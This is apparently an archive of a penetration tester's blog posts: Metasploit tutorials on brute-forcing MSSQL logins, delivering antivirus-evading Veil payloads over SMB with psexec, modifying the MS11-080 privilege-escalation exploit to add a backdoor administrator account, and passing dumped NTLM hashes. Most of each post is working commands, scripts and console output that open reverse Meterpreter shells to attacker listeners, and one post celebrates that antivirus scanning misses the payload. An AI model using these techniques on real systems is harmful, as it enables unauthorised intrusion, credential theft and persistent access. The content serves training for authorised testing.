Archive for category Remote Exploitation

Metasploit Scripting

As any other seasoned pentester, I love using the Metasploit Framework during engagements. Using the database integration helps greatly in keeping all of my reconnaissance scans neatly formatted and easily queried. The “-R” switch was a welcome addition for configuring “RHOSTS” variables within modules (hosts -R, services -p 80 -R, etc…). It utilizes the host and service information within your database to configure modules to target specific hosts instead of sweeping entire ranges. The only piece missing in this utility is that some modules require “RPORT” to be configured as well. I’ll use the “auxiliary/scanner/mssql/mssql_login” module for example. If you used “auxiliary/scanner/mssql/mssql_ping” to scan for SQL servers, it’s very likely that not all of the hosts discovered are running on the old default port 1433, so each non-standard port configuration would have to be tested individually. Previously, to work around this limitation, I would export the results from “mssql_ping” to a text file and use a python script to brute force weak “sa” credentials. Now, I’ve finally figured out how to create a simple resource script to automate the configuration of “RHOSTS” and “RPORT” that i’d like to share.

First, if you’re not familiar with the automation capabilites provided by the Metasploit team, HD wrote a good overview of six different ways to automate the Metasploit Framework. Also, the guys over at Offensive Security have a great intro into the Meterpreter scripting capabilities. Since I’m horrible at ruby scripting, I decided to take the route of a simple resource script, which does take advantage of some simple ruby scripting.

Here is the code:

use auxiliary/scanner/mssql/mssql_login
set USER_FILE /opt/sql_brute/sql_users.txt
set PASS_FILE /opt/sql_brute/sql_wordlist.txt
set VERBOSE false
set THREADS 255


framework.db.hosts.each do |host|
  host.services.each do |service|
    if service.name == "mssql" and service.state == "open"
      self.run_single("set RHOSTS #{host.address}")
      self.run_single("set RPORT #{service.port}")
      self.run_single("run")
    end
  end
end

The script is pretty self-explanatory, but lets walk through it quickly. The upper half simply selects the “mssql_login” module and configures the static options. The lower half of the script is where we drop into the ruby interpreter and create some magic. We iterate through all hosts in the database and all respective services. If the service “name” equals “mssql” and the service is “open”, “RHOSTS” is assigned the IP of that system and “RPORT” is assigned that port. Finally, we “run” the module and any successfully brute forced credentials are displayed with their respective host IP.

Here is a quick example, first running the “mssql_ping” module to enumerate SQL servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.81.0/24
RHOSTS => 192.168.81.0/24
msf auxiliary(mssql_ping) > set THREADS 255
THREADS => 255
msf auxiliary(mssql_ping) > run

[*] Scanned 028 of 256 hosts (010% complete)
[*] SQL Server information for 192.168.81.203:
[+]    ServerName      = VULNXP
[+]    InstanceName    = SQLEXPRESS
[+]    IsClustered     = No
[+]    Version         = 9.00.1399.06
[+]    tcp             = 31337
[*] Scanned 097 of 256 hosts (037% complete)
[*] Scanned 166 of 256 hosts (064% complete)
[*] Scanned 202 of 256 hosts (078% complete)
[*] Scanned 236 of 256 hosts (092% complete)
[*] Scanned 249 of 256 hosts (097% complete)
[*] Scanned 250 of 256 hosts (097% complete)
[*] Scanned 254 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(mssql_ping) > resource /root/scripts/msf/sql_brute.rc 
[*] Processing /root/scripts/msf/sql_brute.rc for ERB directives.
resource (/root/scripts/msf/sql_brute.rc)> use auxiliary/scanner/mssql/mssql_login
resource (/root/scripts/msf/sql_brute.rc)> set USER_FILE /opt/sql_brute/sql_users.txt
USER_FILE => /opt/sql_brute/sql_users.txt
resource (/root/scripts/msf/sql_brute.rc)> set PASS_FILE /opt/sql_brute/sql_wordlist.txt
PASS_FILE => /opt/sql_brute/sql_wordlist.txt
resource (/root/scripts/msf/sql_brute.rc)> set VERBOSE false
VERBOSE => false
resource (/root/scripts/msf/sql_brute.rc)> set THREADS 255
THREADS => 255
[*] resource (/root/scripts/msf/sql_brute.rc)> Ruby Code (277 bytes)
RHOSTS => 192.168.81.203
RPORT => 31337

[*] 192.168.81.203:31337 - MSSQL - Starting authentication scanner.
[+] 192.168.81.203:31337 - MSSQL - successful login 'sa' : 'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

In just a fraction of a second, Metasploit returns successful authentication credentials. This simple script is easy to port to other modules, such as the “auxiliary/scanner/http/tomcat_mgr_login”, “auxiliary/scanner/http/jboss_vulnscan”, or any other module that requires “RHOSTS” and “RPORT” configurations. I would love to see this fucntionality built into Metasploit, but for now, we have a simple workaround. A big thanks goes to the Metasploit Framework development team at Rapid7 for maintainig an incredible framework.

No Comments

Moar Shellz!

Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:

  1. Metasploit psexec
  2. Metasploit psexec_psh
  3. Windows psexec executable
  4. Impacket psexec python script
  5. pth-winexe
  6. pth-wmis
  7. smbexec
  8. Veil-Catapult

All of these tools work and have their strengths and weaknesses. I’m going to share one more method that I recently discovered, using the Metasploit “psexec_command” module, created by Royce Davis (@r3dy__), from Accuvant LABS.

First, we need to create an AV-safe executable to deploy to our target. If you haven’t checked it out yet, Veil-Evasion is one the easiest ways to create AV-safe executables. After we have an executable, we simply create an SMB share for our targets to access.

Add this section to “/etc/samba/smb.conf”:

[payloads$]
   comment = Payloads
   path = /root/veil-output/compiled
   browseable = yes
   read only = yes
   guest ok = yes
   public = yes

In Kali Linux, Samba is not running by default, so we need to start it:

root@kali:~# service samba start
[ ok ] Starting Samba daemons: nmbd smbd.

Next, we startup Metasploit and open a listener:

root@kali:~# msfconsole
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


Large pentest? List, sort, group, tag and search your hosts and services
in Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.9.2-2014043001 [core:4.9 api:1.0] ]
+ -- --=[ 1355 exploits - 830 auxiliary - 237 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops      ]

msf> use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.0:443 
msf exploit(handler) > [*] Starting the payload handler...

Now, we setup “psexec_command” and configure the module to run the executable payload directly from our SMB share:

msf exploit(handler) > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set COMMAND start \\\\192.168.81.196\\payloads$\\TrustedSec39.exe
COMMAND => start \\192.168.81.196\payloads$\TrustedSec39.exe
msf auxiliary(psexec_command) > set RHOSTS 192.168.81.202
RHOSTS => 192.168.81.202
msf auxiliary(psexec_command) > set SMBPass OMGDontPwnMe!
SMBPass => OMGDontPwnMe!
msf auxiliary(psexec_command) > set SMBUser TrustedSec
SMBUser => TrustedSec

Pull the trigger and cross your fingers:

msf auxiliary(psexec_command) > exploit

[*] 192.168.81.202:445 - Executing the command...
[*] Sending stage (769536 bytes) to 192.168.81.202
[*] 192.168.81.202:445 - Getting the command output...
[*] 192.168.81.202:445 - Command finished with no output
[*] 192.168.81.202:445 - Executing cleanup...
[-] 192.168.81.202:445 - Unable to cleanup \WINDOWS\Temp\FtHThcznCVkttXJy.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.202:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_command) > [*] Meterpreter session 1 opened (192.168.81.196:443 -> 192.168.81.202:14336) at 2014-05-06 09:33:39 -0400

It does leave a randomly named txt file in the “Windows\temp” directory that you need to cleanup manually, but that’s it! You can also point RHOSTS to a text file of multiple remote hosts to target.

MOAR SHELLZ!

No Comments

Veil + psexec.py = pwnage

Before I begin, please do not upload any payloads referenced in this tutorial to sites like VirusTotal. Antivirus companies use these samples to create new signatures for their products. OK, on to it.

First of all, Veil is a nice little payload generator that will generate your windows payload all within Kali. It was created by Chris Truncer using some of the antivirus bypass techniques shared by Dave Kennedy and Debasish Mandal. Chris already has a nice tutorial on how to get setup and running. I’ve been using Option 7 to generate payloads, which seems to bypass Microsoft Security Essentials just fine.

Finally, you can use CoreLab’s python version of psexec to execute your payload on a remote machine. To install, simply download the latest version of Impacket and run setup.py.

root@kali:~# wget http://impacket.googlecode.com/files/impacket-0.9.10.tar.gz
root@kali:~# tar -xzvf impacket-0.9.10.tar.gz
root@kali:~# cd impacket-0.9.10/
root@kali:~/impacket-0.9.10# python setup.py install

Let’s walk through a quick example of using both of these tools.

First, we generate a payload:

root@kali:/opt/Veil# python Veil.py 

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What payload type would you like to use?

 1 - Meterpreter - Python - void pointer
 2 - Meterpreter - Python - VirtualAlloc()
 3 - Meterpreter - Python - base64 Encoded
 4 - Meterpreter - Python - Letter Substitution
 5 - Meterpreter - Python - ARC4 Stream Cipher
 6 - Meterpreter - Python - DES Encrypted
 7 - Meterpreter - Python - AES Encrypted
 8 - Meterpreter - C - void pointer
 9 - Meterpreter - C - VirtualAlloc()
 0 - Exit Veil

[>] Please enter the number of your choice: 7

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] Use msfvenom or supply custom shellcode?

 1 - msfvenom (default)
 2 - Custom

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What type of payload would you like?

 1 - Reverse TCP
 2 - Reverse HTTP
 3 - Reverse HTTPS
 0 - Main Menu

[>] Please enter the number of your choice: 1
[?] What's the Local Host IP Address: 192.168.81.201
[?] What's the Local Port Number: 443
[*] Generating shellcode...

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] How would you like to create your payload executable?

 1 - Pyinstaller (default)
 2 - Py2Exe

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[!] Be sure to set up a Reverse TCP handler with the following settings:

 PAYLOAD = windows/meterpreter/reverse_tcp
 LHOST   = 192.168.81.201
 LPORT   = 443

[!] Your payload files have been generated, don't get caught!

root@kali:/opt/Veil# mv payload.exe TrustedSec.exe

Next, we start a multi/handler with “smart_migrate” enabled:

msf exploit(handler) > resource /root/scripts/msf/multi_handler/reverse_tcp.rc 
[*] Processing /root/scripts/msf/multi_handler/reverse_tcp.rc for ERB directives.
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> use multi/handler
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LPORT 443
LPORT => 443
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set AutoRunScript post/windows/manage/smart_migrate
AutoRunScript => post/windows/manage/smart_migrate
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...

Now, we can use “psexec.py” to upload and execute our payload using username/password or username/hash:

Username/password example:
psexec.py TrustedSec:’InformationSecurityMadeSimple!’@192.168.81.129 cmd.exe

Username/hash example:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537 test@192.168.81.129 cmd.exe

Psexec session:

Impacket v0.9.10 - Copyright 2002-2013 Core Security Technologies
Trying protocol 445/SMB...
[*] Requesting shares on 192.168.81.139.....
[*] Found writable share ADMIN$
[*] Uploading file KDgwQrZj.exe
[*] Opening SVCManager on 192.168.81.139.....
[*] Creating service rWGK on 192.168.81.139.....
[*] Starting service rWGK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>put TrustedSec.exe
[*] Uploading TrustedSec.exe to ADMIN$\/
C:\Windows\system32>start TrustedSec.exe
C:\Windows\system32>del ..\\TrustedSec.exe
C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 192.168.81.139.....
[*] Stoping service rWGK.....
[*] Removing service rWGK.....
[*] Removing file KDgwQrZj.exe.....

Reap the shellz:

[*] Sending stage (751104 bytes) to 192.168.81.129
[*] Meterpreter session 1 opened (192.168.81.201:443 -> 192.168.81.129:1038) at 2013-06-09 19:57:17 -0400
[*] Session ID 1 (192.168.81.201:443 -> 192.168.81.129:1038) processing AutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: TrustedSec.exe (1436)
[+] Migrating to 632
[+] Successfully migrated to process

BooYah!!!

No Comments

MS11-080: Privilege Escalation (Windows)

So, I’ve been neglecting this blog lately, while attending the Pentesting with BackTrack course and now studying for my Offensive Security Certified Professional exam. In preparation for the exam, I figured I would start looking for some local privilege escalation exploits. So, I went to the old faithful exploit-db.com and found MS11-080 Afd.sys Privilege Escalation Exploit, which exploits MS11-080. This exploit was written in Python, so we’re going to have to use a trick we learned earlier with PyInstaller to utilize this on a machine that doesn’t already have Python installed. Remember, that we need to setup our Python environment on a Windows machine to compile this exploit (no cross-compile support).

Python environment setup:

 1. Install Python
 2. Install PyInstaller
 3. Install PyWin32 (specific to the version of Python installed above)

PyInstaller compile:

 1. Download the python exploit code to c:\Temp\ms11-080.py
 2. c:> PATH=C:\<Path to python.exe>
 3. c:> cd <Path to PyInstaller.exe>
 4. c:> Python Configure.py
 5. c:> Python Makespec.py --onefile c:\Temp\ms11-080.py
            (creates \ms11-080\ms11-080.spec)
 6. c:> Python Build.py \ms11-080\ms11-080.spec
            (creates \ms11-080\dist\ms11-080.exe)

This will work fine for a gui session. Just run the executable from a command line (ms11-080.exe -O <XP|2K3>), and a nice red console is spawned, running as SYSTEM.

MS11-080 Shell

Let’s try to make this useful for a remote shell session from Meterpreter. Notice, line 238 of the script spawns the elevated shell:

os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")

I’m just going to modify this line to add a new user “spoonman”, then add that user to the local Administrators group. Then I’ll recompile to run on my remote shell.

os.system("cmd.exe /C net user spoonman Hacked! /add")
os.system("cmd.exe /C net localgroup Administrators spoonman /add")

Let’s use Metaploit’s browser_autopwn to get a shell session on the remote machine in the user context.

msf > use auxiliary/server/browser_autopwn
msf  auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
LHOST                        yes       The IP address to use for reverse-connect payloads
SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)

msf  auxiliary(browser_autopwn) > set LHOST 192.168.0.119
LHOST => 192.168.0.119
msf  auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf  auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2011-12-10 17:08:21 -0500
msf  auxiliary(browser_autopwn) >
[*] Done in 2.727867777 seconds

[*] Starting exploit modules on host 192.168.0.119...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QqBTUdAfwgdJ
[*]  Local IP: http://192.168.0.119:8080/QqBTUdAfwgdJ
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/UhJrXyAxDFy
[*]  Local IP: http://192.168.0.119:8080/UhJrXyAxDFy
[*] Server started.

<snip>

[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.0.119:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.0.119:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.0.119:7777
[*] Starting the payload handler...

[*] --- Done, found 23 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.0.119:8080/
[*] Server started.
[*] 192.168.0.116    Browser Autopwn request '/'
[*] 192.168.0.116    Browser Autopwn request '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AyOmVuLXVzOng4NjpNU0lFOjYuMDtTUDI6'
[*] 192.168.0.116    JavaScript Report: Microsoft Windows:XP:SP2:en-us:x86:MSIE:6.0;SP2:
[*] 192.168.0.116    Reporting: {:os_name=>"Microsoft Windows", :os_flavor=>"XP", :os_sp=>"SP2", :os_lang=>"en-us", :arch=>"x86"}
[*] Responding with exploits
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.0.116:2117...
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.0.116:2118 (target: IE 6 SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to 192.168.0.116
[*] Meterpreter session 1 opened (192.168.0.119:3333 -> 192.168.0.116:2119) at 2011-12-10 17:10:10 -0500
[*] Session ID 1 (192.168.0.119:3333 -> 192.168.0.116:2119) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2200)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3836
[+] Successfully migrated to process 

msf  auxiliary(browser_autopwn) > sessions

Active sessions
===============

  Id  Type                   Information             Connection
  --  ----                   -----------             ----------
  1   meterpreter x86/win32  BUDLITE\user @ BUDLITE  192.168.0.119:3333 -> 192.168.0.116:2119

msf  auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: BUDLITE\user
meterpreter > getlwd
/opt/framework/msf3
meterpreter > lcd /var/www
meterpreter > upload ms11-080_adduser.exe
[*] uploading  : ms11-080_adduser.exe -> ms11-080_adduser.exe
[*] uploaded   : ms11-080_adduser.exe -> ms11-080_adduser.exe
meterpreter > shell
Process 3244 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>ms11-080_adduser.exe -O XP
ms11-080_adduser.exe -O XP
The command completed successfully.

The command completed successfully.

[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x804d7000L
[+] HalDispatchTable address: 0x80544a38L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x806ce000L
[+] HaliQuerySystemInformation address: 0x806e4bbaL
[+] HalpSetSystemInformation address: 0x806e7436L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
[*] Restoring token...
[+] Restore done! Have a nice day :)

C:\Documents and Settings\user\Desktop>net localgroup Administrators
net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
spoonman
The command completed successfully.

C:\Documents and Settings\user\Desktop>

Let’s run the compiled executable through VirusTotal:

Antivirus Version Last Update Result
AhnLab-V3 2011.12.10.00 2011.12.09
AntiVir 7.11.19.57 2011.12.09
Antiy-AVL 2.0.3.7 2011.12.10
Avast 6.0.1289.0 2011.12.10
AVG 10.0.0.1190 2011.12.10
BitDefender 7.2 2011.12.10
ByteHero 1.0.0.1 2011.12.07
CAT-QuickHeal 12.00 2011.12.10
ClamAV 0.97.3.0 2011.12.10
Commtouch 5.3.2.6 2011.12.10
Comodo 10911 2011.12.10
Emsisoft 5.1.0.11 2011.12.10
eSafe 7.0.17.0 2011.12.08
eTrust-Vet 37.0.9616 2011.12.09
F-Prot 4.6.5.141 2011.11.29
F-Secure 9.0.16440.0 2011.12.10
Fortinet 4.3.388.0 2011.12.10
GData 22 2011.12.10
Ikarus T3.1.1.109.0 2011.12.10
Jiangmin 13.0.900 2011.12.10
K7AntiVirus 9.119.5640 2011.12.09
Kaspersky 9.0.0.837 2011.12.10
McAfee 5.400.0.1158 2011.12.10
McAfee-GW-Edition 2010.1E 2011.12.10
Microsoft 1.7903 2011.12.10
NOD32 6691 2011.12.07
Norman 6.07.13 2011.12.10
nProtect 2011-12-10.03 2011.12.10
Panda 10.0.3.5 2011.12.10
PCTools 8.0.0.5 2011.12.10
Prevx 3.0 2011.12.10
Rising 23.87.03.02 2011.12.08
Sophos 4.72.0 2011.12.10
SUPERAntiSpyware 4.40.0.1006 2011.12.10
Symantec 20111.2.0.82 2011.12.10
TheHacker 6.7.0.1.354 2011.12.09
TrendMicro 9.500.0.1008 2011.12.10
TrendMicro-HouseCall 9.500.0.1008 2011.12.10
VBA32 3.12.16.4 2011.12.09
VIPRE 11231 2011.12.10
ViRobot 2011.12.10.4819 2011.12.10
VirusBuster 14.1.109.0 2011.12.10

Nope, nothing to see here. Get it while it’s hot!

No Comments

Pass the Hash

Get your mind out of the gutter you hippies.  This is an exploitation technique.

So, let’s assume you used one of the previous local exploits and elevated your effective permissions.  If you’re looking to exploit other machines on the network, an old common exploit practice is to dump the local password hashes and run them through John the Ripper, L0phtcrack, or Rainbow Tables to crack the password.  If you can get the password for the local Administrator account on one machine, you can usually use that password to exploit other machines on the network.  Although, if the password is complex enough or LM hashes aren’t even used, it can take a considerable amount of time to actually crack the password, which is where “passing the hash” comes in.

There is an excellent White Paper from SANS that goes much deeper into the subject than I can here.  The gist of the technique is that instead of going through the extensive process of cracking the password, you can simply pass the clear text hash to the remote machine for authentication.  The easiest tool I’ve found to utilize this technique is the PSEXEC module within Metasploit.  Let’s have a quick demonstration.

First, we use PWDUMP7 to dump the local password hashes.  There is also a “hashdump” utility built into Metasploit, but we’re working locally here, so maybe we can cover that later.  Here is the resulting hash dump:

Administrator:500:NO PASSWORD*********************:8846F7EAEE8FB117AD06BDD830B7586C:::
ASPNET:1006:0252CBAB72B4492F13D74481B172E825:B3236BC498A33A3CA9B3D4C8E48D3373:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
HelpAssistant:1000:107ECC6AB4CB35CFF2F678D9BC377703:B45E9E043A3889F9677F14CB7B2F54B9:::
IUSR_BUDLITE:1004:01C2F26EC4009168A67DFDCFBD090BB0:54D4FFC14D3C6460EEFD7A8194033430:::
IWAM_BUDLITE:1005:379388EA83410A09DC58A39F55298A65:6DEAD04C4D643F7FAF3AEAAA16D68D7F:::
SUPPORT_388945a0:1002:NO PASSWORD*********************:A8DAF152C2B78D9724CECC070C06E407:::

Notice that the Administrator has the entry “NO PASSWORD*********************”.  This simply means that the LM hash is not available and we must replace the string with 32 zeros to utilize it.

Next, we fire up Metasploit and configure the password parameter for the PSEXEC module with the hash that we dumped.

msf > search psexec
[*] Searching loaded modules for pattern 'psexec'...

Exploits
========

 Name                   Disclosure Date  Rank       Description
 ----                   ---------------  ----       -----------
 windows/smb/psexec     1999-01-01       manual     Microsoft Windows Authenticated User Code Execution
 windows/smb/smb_relay  2001-03-31       excellent  Microsoft Windows SMB Relay Code Execution

msf > use windows/smb/psexec
msf exploit(psexec) > show options

Module options:

 Name       Current Setting  Required  Description
 ----       ---------------  --------  -----------
 RHOST                       yes       The target address
 RPORT      445              yes       Set the SMB service port
 SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
 SMBPass                     no        The password for the specified username
 SMBUser                     no        The username to authenticate as

Exploit target:

 Id  Name
 --  ----
 0   Automatic

msf exploit(psexec) > set RHOST 192.168.0.201
RHOST => 192.168.0.201
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
SMBPass => 00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.147:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.201:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \PXmhNDSB.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.201[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.201[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (vzchEyYr - "MFlhSviwvJVrxoiou")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (749056 bytes) to 192.168.0.201
[*] Deleting \PXmhNDSB.exe...
[*] Meterpreter session 1 opened (192.168.0.147:4444 -> 192.168.0.201:1085) at Fri Dec 31 15:57:45 -0500 2010

meterpreter >

And there we have our wonderful Meterpreter session, without even knowing what the actual Administrator password is.  Since this is our first introduction to Metasploit, I have to point you to Metasploit Unleased, which is maintained by the guys at Offensive Security and is an invaluable resource to learn many of the capabilities of the tool.  Check it out!

No Comments